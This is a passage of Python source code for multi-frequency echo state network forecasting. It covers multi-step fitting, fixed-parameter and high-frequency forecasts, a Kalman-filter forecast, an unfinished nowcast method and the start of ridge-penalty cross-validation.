W_multistep = []\n esnmulti_fit_multistep = []\n for s in range(steps):\n # Construct the correct low-freq state index\n ref_dates_s = ref_dates[0:(-1-s)]\n\n # States\n X_ms_multi = np.full((len(ref_dates_s), self.M_), np.nan)\n p = 0\n for j, x_j in enumerate(X):\n ks = 0\n for i, d in enumerate(ref_dates_s):\n cpd, ks = closest_past_date(x_j.index, d, cutoff=ks)\n # Target date\n tgd = ref_dates_0[i]\n # State forward iterations \n iter_x_j = len(x_j.loc[cpd:tgd,])\n # Generate states\n init_x_j = np.squeeze(x_j.loc[cpd,].to_numpy())\n Xj, _ = self.models_[j].base_generate_autostates(\n #T=s+1,\n T=iter_x_j, \n W=W_comps_full[j], init=init_x_j\n )\n #\n #if i == s:\n #plt.plot(Xj)\n #plt.show()\n #\n X_ms_multi[i,p:(p+self.models_N_[j])] = np.squeeze(Xj[-1,])\n p += self.models_N_[j]\n\n # Target\n Y_ms = Y_[(1+s):,]\n\n # Fit\n if (method == 
'none') or (method is None):\n W_multistep.append(np.zeros((1 + X_ms_multi.shape[1], 1))) \n elif method == 'least_squares':\n W_multistep.append(ls_ridge(Y=Y_ms, X=X_ms_multi, Lambda=0))\n elif method == 'ridge':\n W_multistep.append(ls_ridge(Y=Y_ms, X=X_ms_multi, Lambda=Lambda_s[s]))\n else:\n raise ValueError(\"Fitting method not defined\")\n\n # Compute fit objects\n V_fit_ms = np.hstack((np.ones((X_ms_multi.shape[0], 1)), X_ms_multi))\n Y_fit_ms = pd.DataFrame(data=V_fit_ms @ W_multistep[s], index=Y_dates[(1+s):])\n Y_ms = pd.DataFrame(data=Y_ms, index=Y_dates[(1+s):])\n Residuals_ms = Y_ms - Y_fit_ms\n RSS_ms = np.sum(Residuals_ms.to_numpy() ** 2)\n\n esnmulti_fit_multistep.append({\n 's': s+1,\n 'W': W_multistep[s],\n 'Y_fit': Y_fit_ms,\n 'Residuals': Residuals_ms,\n 'RSS': RSS_ms,\n 'Y': Y_ms,\n 'V': V_fit_ms,\n 'X': X_ms_multi,\n })\n\n # Output\n fit_out = {\n 'model': 'ESNMultiFrequency_MultiStep',\n 'fit_for': esnmulti_fit_multistep,\n 'fit_comp_ar': W_comps_full,\n 'steps': steps,\n 'dates': Y_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': method,\n 'Lambda': Lambda,\n 'init': init,\n 'washout_len': washout_len,\n 'state_tuple': X,\n 'pca': None,\n #'end_state': X_multi[-1,],\n }\n\n return fit_out\n\n def fit_now(self, Y, z, method='ridge', Lambda=0, init=None, washout_len=0):\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Check model number\n assert len(self.models_) == 1 + len(z), \"Number of ESN models needs to be exactly 1 + [number of regressors in z]\"\n\n # States\n init = [None for _ in range(1+len(z))] if init is None else init\n assert len(init) == 1 + len(z), \"Length of initialization 'init' must be exactly 1 + [number of regressors in z]\"\n\n X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=0,\n )\n\n # Add state init as pre-stat\n # NOTE: this is currently a hack, as the date assigned \n # to pre-states is always '1800-01-01' to make sure they\n # always have the earliest Datetime.\n X_mod = []\n for Xj in X:\n pre_Xj = pd.DataFrame(\n data=(np.zeros(Xj.shape[1]),), columns=Xj.columns,\n index=pd.DatetimeIndex(('1800-01-01',))\n )\n X_mod.append(pre_Xj.append(Xj))\n #\n X = X_mod\n\n # Find maximal frequency dates\n max_freq = pd.infer_freq(z_dates[0])\n max_periods = infer_periods(max_freq)\n max_freq_dates = z_dates[0]\n for d in z_dates:\n d_f = pd.infer_freq(d)\n p_f = infer_periods(d_f)\n if p_f > max_periods:\n max_freq = d_f\n max_periods = p_f\n max_freq_dates = d\n\n # States matrix\n #X_multi = self.multifreq_states_to_matrix(\n # ref_dates=max_freq_dates, states=X, states_dates=z_dates,\n #)\n\n return None\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ESN Forecasting\n def fixedParamsForecast(self, Yf, zf, fit, steps=None, init=None):\n \"\"\"\n Given a multi-frequency ESNMulti fit compute forecasts of future\n data (Yf, zf) without updating parameters.\n \"\"\"\n\n # Flatter data and extract datetime indexes\n Yf_, Yf_dates, zf_, zf_dates = self.prep_data(Yf, zf)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(zf), \"Number of ESN models does not correspond to number of data series\"\n\n # States\n if init is None:\n init = []\n for_dates = (Yf_dates, ) + zf_dates if self.ar_ else zf_dates\n for j, x_j in enumerate(fit['state_tuple']):\n d = for_dates[j][0]\n cpd, _ = closest_past_date(x_j.index, d - pd.Timedelta(microseconds=1))\n 
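# warm-start reservoir j from the last fitted state strictly before the first forecast date (the 1-microsecond shift makes the comparison strict)\n                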
init.append(np.squeeze(x_j.loc[cpd].to_numpy()))\n\n Xf = self.multifreq_states(\n Y=Yf_, z=zf_, Y_dates=Yf_dates, z_dates=zf_dates,\n init=init, washout_len=0\n )\n\n # Multifrequency state matrix\n Xf_dates = fit['dates'][[-1]].union(Yf_dates)\n Xf_multi = self.multifreq_states_to_matrix(\n ref_dates=Xf_dates, states=Xf,\n )\n\n # Stack initial step\n #Xf_multi = np.vstack(((fit['X'])[-1,], Xf_multi[:-1,]))\n\n # Load training states (necessary for steps > 1)\n V_train = fit['fit_for'][0]['V']\n\n # PCA\n if not fit['pca'] is None:\n Xf_multi = fit['pca'].transform(Xf_multi)\n # NOTE: below is the \"wrong\" time-dimension \"PCA\"\n #pcaf = PCA(n_components=len(fit['fit_for'][0]['W'])-1)\n #Xf_multi = pcaf.fit(Xf_multi.T).components_.T\n\n # Compute forecast\n steps = steps if (not steps is None) and (int(steps) <= fit['steps']) else fit['steps']\n assert steps > 0, \"Forecasting steps must be > 0\"\n\n Forecast = []\n for s in range(steps):\n # Slice matrices\n Xf_s = Xf_multi[0:(-1-s),]\n Vf_for_s = np.hstack((np.ones((Xf_s.shape[0], 1)), Xf_s))\n if s > 0:\n Vf_for_s = np.vstack((V_train[(-s):,], Vf_for_s))[:len(Yf_dates),]\n \n W_s = fit['fit_for'][s]['W']\n \n #Yf_s = pd.DataFrame(data=Yf_[s:,], index=Yf_dates[s:])\n #Yf_for_s = pd.DataFrame(data=Vf_for_s @ W_s, index=Yf_dates[s:])\n Yf_s = Yf\n Yf_for_s = pd.DataFrame(data=Vf_for_s @ W_s, index=Yf_dates)\n Errors_s = Yf_s - Yf_for_s\n FESS_s = np.sum(Errors_s.to_numpy() ** 2)\n\n Forecast.append({\n 's': s+1,\n 'W': W_s,\n 'Y_for': Yf_for_s,\n 'Errors': Errors_s,\n 'FESS': FESS_s,\n 'Y': Yf_s,\n 'V': Vf_for_s,\n 'X': Xf_s,\n })\n\n # Output\n for_out = {\n 'model': 'ESNMultiFrequency',\n 'Forecast': Forecast,\n 'dates': Yf_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': fit['method'],\n 'init': init,\n }\n\n return for_out\n\n def fixedParamsHighFreqForecast(self, Yf, zf, fit, steps=None, init=None):\n \"\"\"\n Given a multi-frequency ESNMulti fit compute high-frequency forecasts \n of future data (Yf, zf) without updating parameters.\n \"\"\"\n\n # Flatter data and extract datetime indexes\n Yf_, Yf_dates, zf_, zf_dates = self.prep_data(Yf, zf)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(zf), \"Number of ESN models does not correspond to number of data series\"\n \n # States\n X_dates = [] # need to recover fit state dates\n if init is None:\n init = []\n for_dates = (Yf_dates, ) + zf_dates if self.ar_ else zf_dates\n for j, x_j in enumerate(fit['state_tuple']):\n d = for_dates[j][0]\n cpd, _ = closest_past_date(x_j.index, d - pd.Timedelta(microseconds=1))\n init.append(np.squeeze(x_j.loc[cpd].to_numpy()))\n X_dates.append(x_j.index)\n\n Xf = self.multifreq_states(\n Y=Yf_, z=zf_, Y_dates=Yf_dates, z_dates=zf_dates,\n init=init, washout_len=0\n )\n\n # Stack training states\n Xf_w_init = []\n for j, xf_j in enumerate(Xf):\n #Xf_w_init.append(fit['state_tuple'][j].iloc[:-1,].append(xf_j))\n Xf_w_init.append(pd.concat([fit['state_tuple'][j].iloc[:-1,], xf_j]))\n\n # Multifrequency state matrix\n steps = steps if (not steps is None) and (int(steps) <= fit['steps']) else fit['steps']\n assert steps > 0, \"Forecasting steps must be > 0\"\n\n # Find maximal frequency dates\n max_freq = pd.infer_freq(X_dates[0])\n max_periods = infer_periods(max_freq)\n max_freq_idx = 0\n for i, d in enumerate(X_dates):\n d_f = pd.infer_freq(d)\n p_f = infer_periods(d_f)\n if p_f > max_periods:\n max_freq = d_f\n max_periods = p_f\n max_freq_idx = i\n max_freq_dates = 
zf_dates[max_freq_idx]\n\n # NOTE: we must make a union with the fit high-freq dates \n max_freq_dates_w_init = (X_dates[max_freq_idx][\n X_dates[max_freq_idx] > fit['dates'][-1-steps]\n ])[:-1].union(max_freq_dates)\n #max_freq_dates_w_init = X_dates[max_freq_idx][:-1].union(max_freq_dates)\n low_freq_dates_w_init = fit['dates'][-1-steps:].union(Yf_dates)\n\n Xf_multi_hf = self.multifreq_states_to_matrix(\n ref_dates=max_freq_dates_w_init, states=Xf_w_init,\n )\n\n # Re-add dates to track states and observations easily\n Xf_hf = pd.DataFrame(data=Xf_multi_hf, index=max_freq_dates_w_init)\n\n # Compute high-frequency forecasts\n # NOTE: we also must identify the max freq dates that are closest to\n # to low freq target dates for slicing\n max2low_freq_dates_w_init = X_dates[max_freq_idx][[0]]\n kt = 0\n for lf_date in low_freq_dates_w_init:\n cpd, kt = closest_past_date(X_dates[max_freq_idx], lf_date, cutoff=kt)\n max2low_freq_dates_w_init = max2low_freq_dates_w_init.union([cpd])\n max2low_freq_dates_w_init = max2low_freq_dates_w_init[1:]\n \n # NOTE: need to be careful to appropriately repeat low-freq\n # target when making high-freq dataframe\n Yf_hf_dates = Xf_hf.index[\n Xf_hf.index >= closest_past_date(zf_dates[max_freq_idx], Yf_dates[0])[0]\n ]\n Yf_hf_s = pd.DataFrame(columns=[0], index=Yf_dates.union(Yf_hf_dates))\n Yf_hf_s.loc[Yf_dates] = Yf\n # Re-align correctly to high-freq \n Yf_hf_s = Yf_hf_s.backfill().loc[Yf_hf_dates]\n\n highFrequencyForecast = []\n for s in range(steps):\n #slice_hs_s = Xf_hf.index[\n # (Xf_hf.index > fit['dates'][(-2-s)]) & (Xf_hf.index <= low_freq_dates_w_init[(-2-s)])\n #]\n slice_hs_s = Xf_hf.index[\n (Xf_hf.index >= max2low_freq_dates_w_init[(-1-s)]) \n & \n (Xf_hf.index <= low_freq_dates_w_init[(-2-s)])\n ]\n\n # Slice matrices\n Xf_hf_s = Xf_hf.loc[slice_hs_s].to_numpy()\n Vf_hf_for_s = np.hstack((np.ones((Xf_hf_s.shape[0], 1)), Xf_hf_s))\n\n W_s = fit['fit_for'][s]['W']\n\n Yf_hf_for_s = pd.DataFrame(data=Vf_hf_for_s @ W_s, index=Yf_hf_dates)\n Errors_s = Yf_hf_s - Yf_hf_for_s\n FESS_s = np.sum(Errors_s.to_numpy() ** 2)\n\n highFrequencyForecast.append({\n 's': s+1,\n 'W': W_s,\n 'Y_for': Yf_hf_for_s,\n 'Errors': Errors_s,\n 'FESS': FESS_s,\n 'Y': Yf_hf_s,\n 'V': Vf_hf_for_s,\n 'X': Xf_hf_s,\n })\n\n # Output\n for_hf_out = {\n 'model': 'ESNMultiFrequency',\n 'highFrequencyForecast': highFrequencyForecast,\n 'dates': Yf_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': fit['method'],\n 'init': init,\n }\n\n return for_hf_out\n\n def fixedParamsKFForecast(self, Yf, zf, fit, steps=None):\n # Flatter data and extract datetime indexes\n Yf_, Yf_dates, zf_, zf_dates = self.prep_data(Yf, zf)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(zf), \"Number of ESN models does not correspond to number of data series\"\n\n # Build \"dupe\" states, only need associated indexes\n #pre_Xf = self.multifreq_states(\n # Y=Yf_, z=zf_, Y_dates=Yf_dates, z_dates=zf_dates,\n # init=[None for _ in range(int(self.ar_) + len(zf))], \n # washout_len=0\n #)\n\n # States indexes\n Xf_multi_idx = []\n for j, zf_dj in enumerate(zf_dates):\n if not self.states_lags_ is None:\n idx_j = np.full((1+self.states_lags_[j], len(Yf_dates)), np.nan)\n else:\n idx_j = np.full((1, len(Yf_dates)), np.nan)\n kt = 0\n for t, lf_date_t in enumerate(Yf_dates):\n _, kt = closest_past_date(zf_dj, lf_date_t, cutoff=kt)\n idx_j[0,t] = kt \n if not self.states_lags_ is None:\n for l in range(self.states_lags_[j]):\n idx_j[1+l,t] = 
kt-1\n # Add 0 index to accound for forecasting inputs\n idx_j = np.c_[np.atleast_2d(np.zeros(1)), idx_j]\n Xf_multi_idx.append(idx_j.astype(int))\n\n # MF-EKF filtering\n Zf = (Yf_, ) + zf_ if self.ar_ else zf_\n\n Yfs1 = Yf_\n\n Ny = Yf_.shape[1]\n Nz = [zfj_.shape[1] for zfj_ in Zf]\n Tf = len(Yf_dates)\n\n # Filter initialization from KF fit\n m0 = fit['fitKF_for'][0]['M_t']\n P0 = fit['fitKF_for'][0]['P_t']\n\n W_a = fit['fitKF_for'][0]['W'][0,:]\n W_w = fit['fitKF_for'][0]['W'][1:,:]\n\n Sigma_eps = fit['fitKF_for'][0]['Sigma_eps']\n Sigma_eta = fit['fitKF_for'][0]['Sigma_eta']\n\n # ESN model parameter aliases\n rho_ = [model.rho_ for model in self.models_]\n A_ = [model.A_ for model in self.models_]\n gamma_ = [model.gamma_ for model in self.models_]\n C_ = [model.C_ for model in self.models_]\n zeta_ = [model.zeta_ for model in self.models_]\n leak_rate_ = [model.leak_rate_ for model in self.models_]\n\n # Multi-Frequency Extended Kalman Filter\n X_prd = np.zeros((self.M_, Tf))\n X_flt = np.zeros((self.M_, Tf))\n L_l_t = np.zeros(Tf)\n LogLike = 0\n\n # Prediction variables\n M0_t = []\n P0_t = P0.copy()\n\n # Update variables\n P_t = P0.copy()\n M_t = m0.copy()\n\n # NOTE: for now, implement only the 'canonical' linearization\n sl = [0 for _ in range(len(zf_))]\n # For each low-frequency period (t-index) from 0 to T-1\n for t in range(Tf):\n m0_t = np.full((self.M_, 1), np.nan)\n # For each reservoir component...\n p = 0\n for j, zfj_ in enumerate(Zf):\n # Prediction: iterate state equations forwards at own freqency (s index)\n m0_s = M_t[j]\n s_range = range(sl[j], Xf_multi_idx[j][0][t]) if (t > 0) else [0,]\n for s in s_range:\n u0_s = (rho_[j] * A_[j]) @ m0_s + (gamma_[j] * C_[j]) @ zfj_[[s],:].T + zeta_[j]\n m0_s = leak_rate_[j] * m0_s + (1 - leak_rate_[j]) * np.tanh(u0_s)\n D_u0_t = 1 - (np.tanh(u0_s) ** 2)\n F_x = leak_rate_[j] * np.eye(self.models_N_[j]) + (1 - leak_rate_[j]) * D_u0_t * rho_[j] * A_[j]\n F_q = (1 - leak_rate_[j]) * D_u0_t * gamma_[j] * C_[j]\n P0_s = F_x @ P_t[j] @ F_x.T + F_q @ np.diagflat(Sigma_eps[j]) @ F_q.T\n P0_s = (P0_s + P0_s.T) / 2\n m0_t[p:(p+self.models_N_[j]),] = m0_s\n P0_t[j] = P0_s\n p += self.models_N_[j]\n # Move s index forward\n sl[j] = Xf_multi_idx[j][0][t]\n # Update: use only last prediction step (s=0 for all j)\n v_t = Yfs1[[t],:].T - (W_w.T @ m0_t + W_a[:,None])\n S_t = W_w.T @ block_diag(*P0_t) @ W_w + np.diagflat(Sigma_eta)\n K_t = block_diag(*P0_t) @ W_w @ np.linalg.inv(S_t)\n m_u_t = m0_t + K_t @ v_t\n P_u_t = block_diag(*P0_t) - K_t @ S_t @ K_t.T\n P_u_t = (P_u_t + P_u_t.T) / 2\n if np.linalg.norm(P_u_t, ord=np.inf) <= 1e-11:\n P_u_t = 1e-12 * np.eye(self.M_)\n # Slice updates to individual reservoirs\n p = 0\n for j in range(len(Zf)):\n M_t[j] = m_u_t[p:(p+self.models_N_[j]),]\n P_t[j] = P_u_t[p:(p+self.models_N_[j]),p:(p+self.models_N_[j])]\n p += self.models_N_[j]\n # Save states\n X_prd[:,t] = np.squeeze(m0_t)\n X_flt[:,t] = np.squeeze(m_u_t)\n # Compute log-likelihood\n L_l_t[t] = multivariate_normal.pdf(\n np.squeeze(Yfs1[[t],:]), \n mean=np.squeeze(W_w.T @ m0_t + W_a[:,None]), cov=S_t\n )\n #\n LogLike = np.sum(np.log(L_l_t + 1e-12))\n\n # Output\n Yf_1 = pd.DataFrame(data=Yfs1, index=Yf_dates)\n Yf_forKF_1 = pd.DataFrame(\n data=np.reshape(W_w.T @ X_prd + W_a[:,None], Yfs1.shape),\n index=Yf_dates,\n )\n Errors_KF_1 = Yf_1 - Yf_forKF_1\n FESS_KF_1 = np.sum(Errors_KF_1 ** 2)\n\n Forecast =[{\n 's': 1,\n 'W': fit['fitKF_for'][0]['W'],\n 'Y_for': Yf_forKF_1,\n 'Errors': Errors_KF_1,\n 'FESS': FESS_KF_1,\n 'Y': Yf_1,\n 
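# NOTE: the filtered/predicted state paths (X_flt, X_prd) are computed above but not returned in this dict\n            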
#'V': Vf_for_s,\n            #'X': Xf_s,\n        }]\n\n        # Output\n        forKF_out = {\n            'model': 'ESNMultiFrequency',\n            'Forecast': Forecast,\n            'dates': Yf_dates,\n            'models': len(self.models_),\n            'model_N': self.models_N_,\n            'method': fit['method'],\n            #'init': init,\n        }\n\n        return forKF_out\n\n    # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    # ESN Multi-step Forecasting\n    def multistepForecast(self, Yf, zf, fit, steps, init=None):\n        \"\"\"\n        Compute multi-step forecasts.\n        \"\"\"\n        # NOTE: to compute multi-step forecasts all single-frequency ESNs\n        # within an ESNMultiFrequency object must be additionally trained \n        # to fit *all* input components. This is necessary to ensure the\n        # state equations can be run autonomously.\n\n        # Check fit object\n        assert 'fit_comp_ar' in fit\n\n        # Flatten data and extract datetime indexes\n        Yf_, Yf_dates, zf_, zf_dates = self.prep_data(Yf, zf)\n\n        # Check model number vs data\n        assert len(self.models_) == int(self.ar_) + len(zf), \"Number of ESN models does not correspond to number of data series\"\n\n        # States\n        if init is None:\n            init = []\n            for_dates = (Yf_dates, ) + zf_dates if self.ar_ else zf_dates\n            for j, x_j in enumerate(fit['state_tuple']):\n                d = for_dates[j][0]\n                cpd, _ = closest_past_date(x_j.index, d - pd.Timedelta(microseconds=1))\n                init.append(np.squeeze(x_j.loc[cpd].to_numpy()))\n\n        Xf = self.multifreq_states(\n            Y=Yf_, z=zf_, Y_dates=Yf_dates, z_dates=zf_dates,\n            init=init, washout_len=0\n        )\n\n        # Infer regressors frequencies\n        #Xf_freq = []\n        #for xf_j in Xf:\n        #    Xf_freq.append(pd.infer_freq(xf_j.index))\n\n        # Infer Yf offsets to date multi-steps forecasts\n        #Yf_freq = pd.infer_freq(Yf_dates)\n        #Yf_date_offset = pd.tseries.frequencies.to_offset(Yf_freq)\n\n        # Stack training states\n        # NOTE: to produce a consistent multistep forecast (exactly 'steps'\n        # forecasts for each target in the 'Yf' argument), we additionally\n        # stack the training states to the testing states\n        Xf_w_init = []\n        for j, xf_j in enumerate(Xf):\n            #Xf_w_init.append(fit['state_tuple'][j].iloc[:-1,].append(xf_j))\n            Xf_w_init.append(pd.concat([fit['state_tuple'][j].iloc[:-1,], xf_j]))\n\n        # Compute multi-step forecast\n        #steps = steps if (not steps is None) and (int(steps) <= fit['steps']) else fit['steps']\n        assert steps > 0, \"Forecasting steps must be > 0\"\n\n        # State reference dates\n        ref_dates = fit['dates'].append(Yf_dates)\n        ref_index = len(fit['dates']) - 1\n        ref_dates_0 = ref_dates[ref_index:]\n\n        multistepForecast = []\n        for s in range(steps):\n            # Construct the correct low-freq state index\n            #ref_dates_s = fit['dates'][(-1-s):].append(Yf_dates[0:(-1-s)])\n            ref_dates_s = ref_dates[(ref_index - s):(-1-s)]\n\n            # States\n            #X_ms = []\n            X_ms_multi = np.full((len(ref_dates_s), self.M_), np.nan)\n            p = 0\n            for j, xf_j in enumerate(Xf_w_init):\n                ks = 0\n                for i, d in enumerate(ref_dates_s):\n                    cpd, ks = closest_past_date(xf_j.index, d, cutoff=ks)\n                    # Target date\n                    tgd = ref_dates_0[i]\n                    # State forward iterations \n                    iter_xf_j = len(xf_j.loc[cpd:tgd,])\n                    # Generate states\n                    init_xf_j = np.squeeze(xf_j.loc[cpd,].to_numpy())\n                    Xj, _ = self.models_[j].base_generate_autostates(\n                        #T=s+1,\n                        T=iter_xf_j, \n                        W=fit['fit_comp_ar'][j], init=init_xf_j\n                    )\n                    #\n                    #if False:\n                    #if s == 2:\n                    #if i == s and s > 0:\n                    #    plt.figure(figsize=(5, 2))\n                    #    plt.plot(Xj)\n                    #    plt.show()\n                    #\n                    X_ms_multi[i,p:(p+self.models_N_[j])] = np.squeeze(Xj[-1,])\n                p += self.models_N_[j]\n\n            # PCA\n            if not fit['pca'] is None:\n                X_ms_multi = fit['pca'].transform(X_ms_multi)\n\n            # Load coefficients\n            if 
fit['model'] == 'ESNMultiFrequency':\n Ws = fit['fit_for'][0]['W']\n elif fit['model'] == 'ESNMultiFrequency_MultiStep':\n Ws = fit['fit_for'][s]['W']\n else:\n raise TypeError(\"Model type of fit object not recognized\")\n \n # Forecasts\n V_ms_s = np.hstack((np.ones((X_ms_multi.shape[0], 1)), X_ms_multi))\n Y_ms_for_s = pd.DataFrame(data=V_ms_s @ Ws, index=Yf_dates)\n \n multistepForecast.append({\n 's': s+1,\n 'ref_dates': ref_dates_s,\n 'Y_for': Y_ms_for_s,\n 'V': V_ms_s,\n 'X': X_ms_multi,\n #'state_tuple': X_ms,\n })\n\n \n #multistepForecast = []\n #for t, d in enumerate(Yf_dates[1:]):\n # d_plus_steps = d + (steps-1)*Yf_date_offset\n # ref_dates_t = pd.date_range(d, d_plus_steps, freq=Yf_freq)\n\n # # States\n # X_ms = []\n # X_ms_multi = np.full((len(ref_dates_t), self.M_), np.nan)\n # p = 0\n # for j, xf_j in enumerate(Xf_w_init):\n # # Compute dates range\n # d_range_j = pd.date_range(d, d_plus_steps, freq=Xf_freq[j])\n # # NOTE: this is a hack to make sure the cdp is strictly in the past\n # cpd, _ = closest_past_date(xf_j.index, d - pd.Timedelta(microseconds=1))\n # # Generate states\n # init_xf_j = np.squeeze(xf_j.loc[cpd,].to_numpy())\n # Xj, _ = self.models_[j].base_generate_autostates(\n # T=len(d_range_j), \n # W=fit['fit_comp_ar'][j], \n # init=init_xf_j\n # )\n # # Add dates to states\n # Xj = pd.DataFrame(\n # Xj, columns=tuple(map(lambda x : 'C'+str(x), range(Xj.shape[1]))),\n # index=d_range_j\n # )\n # X_ms.append(Xj)\n # #\n # ks = 0\n # for s, lf_date_t in enumerate(ref_dates_t):\n # #cpd, _ = closest_past_date(states_dates[j-1], lf_date_t)\n # cpd, ks = closest_past_date(Xj.index, lf_date_t, cutoff=ks)\n # X_ms_multi[s,p:(p+self.models_N_[j])] = np.squeeze(Xj.loc[cpd])\n # #\n # p += self.models_N_[j]\n\n # # PCA\n # if not fit['pca'] is None:\n # X_ms_multi = fit['pca'].transform(X_ms_multi)\n # \n # # Forecasts\n # V_ms_t = np.hstack((np.ones((X_ms_multi.shape[0], 1)), X_ms_multi))\n # Y_ms_for_t = pd.DataFrame(data=V_ms_t @ W0, index=ref_dates_t)\n # \n # multistepForecast.append({\n # 't': t,\n # 'start_date': d,\n # 'Y_for': Y_ms_for_t,\n # 'V': V_ms_t,\n # 'X': X_ms_multi,\n # 'state_tuple': X_ms,\n # })\n \n \n # Output\n for_out = {\n 'model': 'ESNMultiFrequency',\n 'multistepForecast': multistepForecast,\n 'Yf': Yf,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': fit['method'],\n 'init': init,\n }\n\n return for_out\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ESN Nowcasting\n def fixedParamsNowcast(self, Yf, zf, fit, steps=None, init=None, debug=False):\n if True:\n \"\"\"\n !!!\n TODO: need to correctly implement fit_now() method, because below \n we are not computing the nowcast but a high-frequency forecast\n \"\"\"\n print(\"Error: method needs to be updated!\")\n return None\n\n # Flatter data and extract datetime indexes\n Yf_, Yf_dates, zf_, zf_dates = self.prep_data(Yf, zf)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(zf), \"Number of ESN models does not correspond to number of data series\"\n\n # Find maximal frequency dates\n max_freq = pd.infer_freq(zf_dates[0])\n max_periods = infer_periods(max_freq)\n max_freq_dates = zf_dates[0]\n for d in zf_dates:\n d_f = pd.infer_freq(d)\n p_f = infer_periods(d_f)\n if p_f > max_periods:\n max_freq = d_f\n max_periods = p_f\n max_freq_dates = d\n\n # States\n #if init is None:\n # init = []\n # for Xj in fit['state_tuple']:\n # init.append(np.squeeze(Xj.iloc[-1,].to_numpy()))\n\n if init is None:\n init = 
[]\n init_dates = (Yf_dates, ) + zf_dates if self.ar_ else zf_dates\n for j, x_j in enumerate(fit['state_tuple']):\n d = init_dates[j][0]\n cpd, _ = closest_past_date(x_j.index, d - pd.Timedelta(microseconds=1))\n init.append(np.squeeze(x_j.loc[cpd].to_numpy()))\n\n Xf = self.multifreq_states(\n Y=Yf_, z=zf_, Y_dates=Yf_dates, z_dates=zf_dates,\n init=init, washout_len=0\n )\n\n # Add state init as pre-stat\n #Xf_w_init = []\n #for j, Xfj in enumerate(Xf):\n # Xf_w_init.append(\n # fit['state_tuple'][j].iloc[-1:,].append(Xfj)\n # )\n \n # States matrix\n Xf_multi_hf = self.multifreq_states_to_matrix(\n ref_dates=max_freq_dates, states=Xf,\n )\n \n # Re-add dates to track states and observations easily\n Yf_ = pd.DataFrame(data=Yf_, index=Yf_dates)\n Xf_now = pd.DataFrame(data=Xf_multi_hf, index=max_freq_dates)\n\n # Compute nowcast\n W_n = fit['fit_for'][0]['W']\n\n Y_now = pd.DataFrame(data=np.full(len(max_freq_dates), np.nan), index=max_freq_dates)\n Y = Y_now.copy()\n Errors = Y_now.copy()\n\n for d in max_freq_dates:\n Xf_now_d = Xf_now.loc[d].to_numpy().reshape(1, -1)\n\n # PCA\n if not fit['pca'] is None:\n Xf_now_d = fit['pca'].transform(Xf_now_d)\n\n cfd, _ = closest_future_date(Yf_dates, d)\n\n Y_now_d = np.hstack((np.ones((1, 1)), Xf_now_d)) @ W_n\n Y_d = Yf_.loc[cfd]\n Error_d = Y_d - np.squeeze(Y_now_d)\n \n Y_now.loc[d] = Y_now_d\n Y.loc[d] = Y_d\n Errors.loc[d] = Error_d\n NESS = np.sum(Errors.to_numpy() ** 2)\n\n Nowcast = [{\n 'Y_now': Y_now,\n 'Errors': Errors,\n 'NESS': NESS,\n 'Y': Y,\n 'V': Y_now,\n 'X': Xf_multi_hf, \n }]\n\n # Output\n now_out = {\n 'model': 'ESNMultiFrequency',\n 'Nowcast': Nowcast,\n 'dates': max_freq_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': fit['method'],\n 'init': init,\n }\n\n return now_out\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ESN Multi-frequency ridge penalty cross-validation\n \n def ridge_lambda_cv(self, Y, z, method='ridge', cv_options='-cv:5', steps=1, Lambda0=1e-1,\n steps_weights=None, Lambda_comps=None, init=None, washout_len=0, debug=True):\n if debug: print(\"ESNMultiFrequency.ridge_lambda_cv()\")\n\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Decompose optimization type string\n method_name = re.findall(\"^\\w+(?=-)?\", method)\n method_opts = re.findall(\"(?<=-)\\w+(?=:)?\", method)\n method_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", method)\n\n assert method_name[0] == 'ridge', \"Only supported method is 'ridge'\"\n\n if debug:\n print(\". Method:\")\n print(method_name)\n print(method_opts)\n print(method_nums)\n\n cv_opts = re.findall(\"(?<=-)\\w+(?=:)?\", cv_options)\n cv_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", cv_options)\n\n if debug:\n print(\". 
CV Options:\")\n print(cv_opts)\n print(cv_nums)\n\n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n \n X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=washout_len,\n )\n\n # States matrix\n X_multi = self.multifreq_states_to_matrix(\n ref_dates=Y_dates, states=X,\n )\n\n # OPTIONAL: reduce state dimensionalty using PCA\n pca = None\n if 'pca' in method_opts:\n pca_factor = float(method_nums[method_opts.index('pca')])\n assert pca_factor > 0\n if pca_factor > 1:\n pca_factor = int(pca_factor)\n\n # PCA\n pca = PCA(n_components=pca_factor)\n X_multi = pca.fit_transform(X_multi)\n # NOTE: below is the \"wrong\" time-dimension \"PCA\"\n #X_multi = pca.fit(X_multi.T).components_.T\n\n if debug: print(f\". PCA: states space size reduced to N = {pca.n_components_}\")\n\n # Fallback parameters\n cv_splits = 2\n test_size = None\n cv_min_split_size = None\n cv_max_split_size = None\n if 'cv' in cv_opts: \n cv_splits = int(cv_nums[cv_opts.index('cv')])\n assert cv_splits >= 0\n if 'test_size' in cv_opts:\n test_size = 